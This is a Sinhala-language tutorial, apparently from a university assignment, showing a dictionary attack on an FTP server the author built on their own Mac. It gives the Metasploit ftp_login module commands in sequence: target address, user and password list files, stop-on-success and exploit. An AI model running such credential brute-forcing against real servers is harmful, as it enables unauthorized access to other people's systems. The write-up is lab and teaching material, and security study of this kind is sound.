හරි පිංවතුනි අද කියන්න හදන්නේ Degree එකේදී කරපු තව assignment එකක්
ඒ තමා කොහොමද ftp server එකකට Dictionary attack එකක් දෙන්නේ කියල.
වැඩි කතා ඕනි නෑ අපි වැඩේට බහිමුකො
- මේකෙදි මගේ මැක් එකෙන් ftp service එකක් හැදුව
මගේ Mac-server එකේ FTP Server එක on කරලා ftp user කෙනෙක් හැදුව. පාස්වඩ් දැම්මේ simple එකක්. - මේ තියෙන්නේ mac එකේ ftp server එක on කරපු විදිහ
ඔයාලට පුළුවන් windows server එකක ftp එකක් දාන්න නැත්තම් ලිනක්ස් වලත් පුළුවන්
- මේ තියෙන්නේ user ව හදපු විදිහ
- ඊටපස්සේ මන් ඒ හදපු user ව folder එකක් හදල එකට දුන්න
- ඊටපස්සේ වෙන මැෂින් එකකින් ලොග් වෙලා බැලුව හරිද කියල ඔන්න වැඩ
- ඊටපස්සේ මන් කාලි එකට ගිහිල්ලා userlist එකක් සහ password list එකක් හදාගත්ත.
user ලිස්ට් එකේ අපිට පුළුවන් attack කරන්න ඕනි env එකේ විදිහට නම් දාන්න උදාහරණයක් කිව්වොත් ලංකාවේ office වල බොබ් ල බිල් ලා නෑනේ ඉන්නේ අමල් කමල් නිමල් වගේ නේ ඉතින් අපි හැමවෙලාවෙම ප්රායෝගික විදිහට හිතන්න ඕනි
මන් මෙතන කරන්නේ demo එකක් නිසා මන් ම ftp service එක හදල මන් ම හැක් කරනවා නමුත් ඇත්තටම ඒක නෙමේ වෙන්න ඕනි.
මේ විදිහට user ලිස්ට් එකයි pass ලිස්ට් එකයි හදාගන්න
- දැන් metasploit එක open කරන්න මේ විදිහට වැටෙයි.
- දැන් මේ කමාන්ඩ් එක ගහන්න “use
auxiliary/scanner/ftp/ftp_login”
- දැන් අපි attack කරන්න ඕනි කෙනාගේ ip එක ගහන්න “msf exploit
(ftp_login)>set rhosts 192.168.1.103”
- දැන් අපි හදාගත්ත user name file එක සෙට් කරන්න “msf exploit
(ftp_login)>set user_file
/root/Desktop/passusr.txt”
- දැන් පාස්වර්ඩ් file එකත් add කරගන්න මේ විදිහට “msf exploit
(ftp_login)>set PASS_FILE /root/Desktop/passlist.txt”
- දැන් කරන්න හදන්නේ username පාස්වඩ් හොයාගත්ත ගමන් නවත්තන්න කියල එකට මේක ගහන්න “msf
exploit (ftp_login)>set stop_on_success true”
- දැන් ඉතින් මේ විදිහට දෙන්න තියෙන්නේ “msf exploit (ftp_login)>
exploit”
එතකොට මේ වගේ අර අපි දීපු username file එකයි පාස්වර්ඩ් ෆයිල් එකයි තියන ඒවා ටෙස්ට් කර කර බලනවා හරියනවද කියල
- අන්තිමට හරිගියාම මේ විදිහට පෙන්නනවා
ඔන්න ඉතින් අපි ftp server එකකුත් හැක් කරා
ඉතින් කියන්න තියෙන්නේ security එක ගැන මීට වඩා හිතන්න කියල
ගිහින් එන්නම්...